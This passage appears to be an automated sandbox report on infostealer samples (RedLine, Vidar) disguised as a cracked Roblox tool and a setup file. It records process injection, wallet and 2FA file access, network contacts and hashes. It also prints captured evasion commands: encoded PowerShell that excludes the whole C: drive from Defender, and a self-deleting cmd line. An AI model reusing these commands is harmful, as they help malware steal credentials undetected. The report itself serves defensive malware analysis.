PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 364 wrote to memory of 5032 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe
PID 1020 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1020 wrote to memory of 372 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Installer.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA3AA==

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -ENC cwBlAHQALQBtAHAAcAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AZQB4AGMAbAB1AHMAaQBvAG4AcABhAHQAaAAgAEMAOgBcAA==

Network

Country Destination Domain Proto
N/A 20.189.173.15:443 tcp
N/A 8.8.8.8:53 falcaoliderfm.com.br udp
N/A 192.185.216.127:443 falcaoliderfm.com.br tcp
N/A 178.79.208.1:80 tcp
N/A 178.79.208.1:80 tcp
N/A 178.79.208.1:80 tcp
N/A 93.184.221.240:80 tcp
N/A 93.184.220.29:80 tcp
N/A 77.73.133.23:80 77.73.133.23 tcp

Files

memory/364-132-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

MD5 d57db4d9896f6a1b0f72e4503ba94ed0
SHA1 e4dc13b4c7ee490bd268e2241f8812cb3e3d5744
SHA256 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d
SHA512 ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

MD5 d57db4d9896f6a1b0f72e4503ba94ed0
SHA1 e4dc13b4c7ee490bd268e2241f8812cb3e3d5744
SHA256 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d
SHA512 ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52

memory/364-135-0x00000000000A0000-0x00000000000A8000-memory.dmp

memory/364-136-0x0000000004F10000-0x00000000054B4000-memory.dmp

memory/364-137-0x0000000004A50000-0x0000000004AE2000-memory.dmp

memory/364-138-0x0000000004C00000-0x0000000004C0A000-memory.dmp

memory/364-139-0x0000000007EB0000-0x0000000007ED2000-memory.dmp

memory/1180-140-0x0000000000000000-mapping.dmp

memory/1180-141-0x0000000002F60000-0x0000000002F96000-memory.dmp

memory/1180-142-0x00000000056F0000-0x0000000005D18000-memory.dmp

memory/1180-143-0x0000000005E90000-0x0000000005EF6000-memory.dmp

memory/1180-144-0x0000000005F00000-0x0000000005F66000-memory.dmp

memory/1180-145-0x0000000006500000-0x000000000651E000-memory.dmp

memory/1180-146-0x0000000007E10000-0x000000000848A000-memory.dmp

memory/1180-147-0x0000000006A40000-0x0000000006A5A000-memory.dmp

memory/1020-148-0x0000000000000000-mapping.dmp

memory/5032-149-0x0000000000000000-mapping.dmp

memory/5032-150-0x0000000000400000-0x000000000041E000-memory.dmp

memory/372-151-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\dienetwoov.exe

MD5 d57db4d9896f6a1b0f72e4503ba94ed0
SHA1 e4dc13b4c7ee490bd268e2241f8812cb3e3d5744
SHA256 6a320e135997a07575d8433261146653b3b5c6dd71195ba5e0f892d20a85a09d
SHA512 ad99c68a7c31df3d26f195e758e76aed1a4a00f4ef4ad25af5812e3be27940a3002428ec21121be54e47f13ec3145b5c46568e83ff98898f8a52aef8884bea52

memory/5032-154-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 4280e36a29fa31c01e4d8b2ba726a0d8
SHA1 c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256 e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8ad6260b5656f92436334157a2a08961
SHA1 d1fe686740e0b72d1cfb956673c7293fba05869a
SHA256 9c475d6c0f06a27bff2ebf8b3749a4135ae52bf9259029c16c4d3668232bfd80
SHA512 65ec7c87e1e9636e7a27a9ba51b6ce3b6b92e4245a2ef504c895818f29cb9486c0f43cb52750c692e17eda6205058cc29eb2d5de742b203b710fdee19d61ae45

memory/5032-157-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 06ad34f9739c5159b4d92d702545bd49
SHA1 9152a0d4f153f3f40f7e606be75f81b582ee0c17
SHA256 474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba
SHA512 c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

memory/372-159-0x0000000006960000-0x0000000006992000-memory.dmp

memory/372-160-0x0000000070D90000-0x0000000070DDC000-memory.dmp

C:\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 dbf4f8dcefb8056dc6bae4b67ff810ce
SHA1 bbac1dd8a07c6069415c04b62747d794736d0689
SHA256 47b64311719000fa8c432165a0fdcdfed735d5b54977b052de915b1cbbbf9d68
SHA512 b572ca2f2e4a5cc93e4fcc7a18c0ae6df888aa4c55bc7da591e316927a4b5cfcbdda6e60018950be891ff3b26f470cc5cce34d217c2d35074322ab84c32a25d1

C:\Users\Admin\AppData\LocalLow\nss3.dll

MD5 f67d08e8c02574cbc2f1122c53bfb976
SHA1 6522992957e7e4d074947cad63189f308a80fcf2
SHA256 c65b7afb05ee2b2687e6280594019068c3d3829182dfe8604ce4adf2116cc46e
SHA512 2e9d0a211d2b085514f181852fae6e7ca6aed4d29f396348bedb59c556e39621810a9a74671566a49e126ec73a60d0f781fa9085eb407df1eefd942c18853be5

C:\Users\Admin\AppData\LocalLow\mozglue.dll

MD5 f07d9977430e762b563eaadc2b94bbfa
SHA1 da0a05b2b8d269fb73558dfcf0ed5c167f6d3877
SHA256 4191faf7e5eb105a0f4c5c6ed3e9e9c71014e8aa39bbee313bc92d1411e9e862
SHA512 6afd512e4099643bba3fc7700dd72744156b78b7bda10263ba1f8571d1e282133a433215a9222a7799f9824f244a2bc80c2816a62de1497017a4b26d562b7eaf

memory/372-164-0x0000000006930000-0x000000000694E000-memory.dmp

memory/372-165-0x0000000007720000-0x000000000772A000-memory.dmp

memory/372-166-0x0000000007970000-0x0000000007A06000-memory.dmp

memory/372-167-0x0000000006A10000-0x0000000006A1E000-memory.dmp

memory/372-168-0x00000000078D0000-0x00000000078EA000-memory.dmp

memory/372-169-0x00000000078B0000-0x00000000078B8000-memory.dmp

memory/5032-170-0x0000000000400000-0x000000000041E000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:17

Platform

win7-20221111-en

Max time kernel

142s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"

Signatures

RedLine

infostealer redline

Uses the VBS compiler for execution

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 568 set thread context of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 520 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
PID 568 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\SysWOW64\WerFault.exe
PID 568 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\SysWOW64\WerFault.exe
PID 568 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\SysWOW64\WerFault.exe
PID 568 wrote to memory of 1448 N/A C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe

"C:\Users\Admin\AppData\Local\Temp\infected\RobloxSynapceX Cracked.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 568 -s 36

Network

Country Destination Domain Proto
N/A 82.115.223.46:57672 tcp

Files

memory/520-56-0x0000000000400000-0x0000000000430000-memory.dmp

memory/520-54-0x0000000000400000-0x0000000000430000-memory.dmp

memory/520-61-0x000000000041BCAE-mapping.dmp

memory/568-62-0x0000000000370000-0x00000000003F7000-memory.dmp

memory/520-63-0x0000000000400000-0x0000000000430000-memory.dmp

memory/520-64-0x0000000000400000-0x0000000000430000-memory.dmp

memory/1448-65-0x0000000000000000-mapping.dmp

memory/520-66-0x0000000075491000-0x0000000075493000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win7-20221111-en

Max time kernel

26s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"

Signatures

Vidar

stealer vidar

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1800 set thread context of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1800 wrote to memory of 296 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"

Network

N/A

Files

memory/1800-54-0x0000000000CB0000-0x000000000171E000-memory.dmp

memory/1800-55-0x000000001C240000-0x000000001C49E000-memory.dmp

memory/296-56-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-57-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-59-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-61-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-63-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-65-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-66-0x0000000000421BEC-mapping.dmp

memory/296-68-0x0000000000400000-0x0000000000460000-memory.dmp

memory/296-69-0x0000000000400000-0x0000000000460000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2023-01-15 17:11

Reported

2023-01-15 17:16

Platform

win10v2004-20220812-en

Max time kernel

140s

Max time network

158s

Command Line

"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"

Signatures

Vidar

stealer vidar

Accesses 2FA software files, possible credential harvesting

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2512 set thread context of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 2512 wrote to memory of 4888 N/A C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4888 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4888 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 4888 wrote to memory of 2392 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\SysWOW64\cmd.exe
PID 2392 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2392 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2392 wrote to memory of 1828 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe

"C:\Users\Admin\AppData\Local\Temp\infected\Setup x64.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" & exit

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

Network

Country Destination Domain Proto
N/A 93.184.220.29:80 tcp
N/A 8.8.8.8:53 t.me udp
N/A 149.154.167.99:443 t.me tcp
N/A 49.12.113.110:80 49.12.113.110 tcp
N/A 95.101.78.82:80 tcp
N/A 95.101.78.82:80 tcp
N/A 104.80.225.205:443 tcp
N/A 51.11.192.48:443 tcp

Files

memory/2512-132-0x0000000000D90000-0x00000000017FE000-memory.dmp

memory/2512-133-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

memory/4888-134-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4888-135-0x0000000000421BEC-mapping.dmp

memory/4888-136-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4888-137-0x0000000000400000-0x0000000000460000-memory.dmp

memory/2512-138-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmp

memory/4888-139-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4888-140-0x0000000000400000-0x0000000000460000-memory.dmp

memory/4888-141-0x0000000051270000-0x0000000051302000-memory.dmp

C:\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

C:\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

memory/2392-162-0x0000000000000000-mapping.dmp

memory/4888-163-0x0000000000400000-0x0000000000460000-memory.dmp

memory/1828-164-0x0000000000000000-mapping.dmp